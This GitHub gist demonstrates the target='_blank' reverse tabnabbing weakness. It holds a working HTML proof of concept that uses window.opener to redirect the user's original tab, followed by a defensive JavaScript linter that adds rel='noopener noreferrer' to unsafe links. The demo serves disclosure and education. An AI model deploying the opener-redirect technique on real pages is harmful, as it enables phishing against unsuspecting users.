Created August 26, 2016 08:59
Gist: Dan-Q/a555460a952284e590d8c6da06dfb147
Demonstration of the target="_blank" vulnerability found on many websites.
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>target="_blank" vulnerability demo</title>
<style>
body {
  margin: 0;
  overflow: hidden;
}
p {
  margin: 8px;
}
iframe {
  width: 100vw;
  height: 100vh;
  border: 0;
}
</style>
<script>
window.onload = function(){
  var body = document.getElementsByTagName('body')[0];
  if(window.location.hash.length > 0){
    // Second load, now in the tab that originally linked here: the URL fragment
    // carries the referring site, which is shown inside a full-screen iframe.
    body.innerHTML = '<iframe src="'+window.location.hash.substr(1)+'"></iframe>';
  } else if(window.opener){
    // Opened from a link with target="_blank" and no rel="noopener": window.opener
    // is the linking tab, and this page can navigate it to a URL of its choosing.
    window.opener.location = window.location.href+'#'+document.referrer;
    body.innerHTML = '<p>Wait for a few seconds, then go back to your previous tab...</p>';
  } else {
    // No opener: the page was reached directly, so there is nothing to demonstrate.
    body.innerHTML = '<p>To see this page work, link to this page from your site, using a target="_blank" attribute to cause the link to open in a new window/tab.</p>';
  }
}
</script>
</head>
<body>
</body>
</html>
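As an added example (not part of Dan-Q's gist), the following JavaScript audits an HTML document for links that open a new tab without rel="noopener", which is the condition that gives the demo page above a usable window.opener, and rewrites them with rel="noopener noreferrer". The function names, the regular expressions and the sample page are my own assumptions; the code runs under Node or in a browser console.

```javascript
// Added example, not part of the gist: find target="_blank" anchors that lack
// rel="noopener" (the mitigation for the window.opener behaviour demonstrated
// above) and rewrite them. Regex-based on purpose so it works as a CI lint
// over raw templates without a DOM; it is not a full HTML parser.

const ANCHOR_RE = /<a\b[^>]*>/gi;
const ATTR_RE = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;

// Parse the attributes of one <a ...> opening tag into an object keyed by
// lower-cased attribute name. Quoted and unquoted values are handled.
function parseAttrs(tag) {
  const attrs = {};
  ATTR_RE.lastIndex = 0;
  let m;
  while ((m = ATTR_RE.exec(tag)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? '';
  }
  return attrs;
}

// A target="_blank" link needs fixing unless rel already carries noopener.
// The HTML spec makes noreferrer imply noopener, so that token is accepted too.
function needsNoopener(attrs) {
  if ((attrs.target || '').toLowerCase() !== '_blank') return false;
  const rel = (attrs.rel || '').toLowerCase().split(/\s+/).filter(Boolean);
  return !rel.includes('noopener') && !rel.includes('noreferrer');
}

// Rewrite one opening <a ...> tag so rel contains both noopener and noreferrer,
// keeping any rel tokens it already had. Safe tags are returned unchanged.
function hardenAnchorTag(tag) {
  const attrs = parseAttrs(tag);
  if (!needsNoopener(attrs)) return tag;
  const tokens = (attrs.rel || '').split(/\s+/).filter(Boolean);
  for (const t of ['noopener', 'noreferrer']) {
    if (!tokens.includes(t)) tokens.push(t);
  }
  const relValue = tokens.join(' ');
  if ('rel' in attrs) {
    // Replace the existing rel attribute in place (lookbehind avoids data-rel etc.).
    return tag.replace(/(?<![\w-])rel\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+)/i, `rel="${relValue}"`);
  }
  return tag.replace(/^<a\b/i, `<a rel="${relValue}"`);
}

// Scan a whole document: returns the offending opening tags and the hardened HTML.
function auditHtml(html) {
  const findings = [];
  const hardened = html.replace(ANCHOR_RE, (tag) => {
    if (needsNoopener(parseAttrs(tag))) findings.push(tag);
    return hardenAnchorTag(tag);
  });
  return { findings, hardened };
}

// Constructed sample page: two unsafe links, one already hardened, one same-tab link.
const SAMPLE_HTML = `
<p><a href="https://example.com/a" target="_blank">unsafe</a></p>
<p><a target='_blank' rel="nofollow" href="https://example.com/b">unsafe, has rel</a></p>
<p><a href="https://example.com/c" target="_blank" rel="noopener">already safe</a></p>
<p><a href="/local">same tab</a></p>`;

if (typeof require !== 'undefined' && require.main === module) {
  const { findings, hardened } = auditHtml(SAMPLE_HTML);
  console.log(`${findings.length} link(s) missing rel="noopener":`);
  findings.forEach((t) => console.log('  ' + t));
  console.log(hardened);
}
```

Run against the constructed sample it reports the two unsafe anchors and emits a copy of the page in which both carry rel="noopener noreferrer", leaving the already-hardened and same-tab links untouched. In a live page the same check is simpler with the DOM, iterating document.querySelectorAll('a[target="_blank"]') and setting rel on each; current browsers also treat target="_blank" as noopener by default, but the explicit rel attribute remains the portable fix for older clients and for links generated by JavaScript.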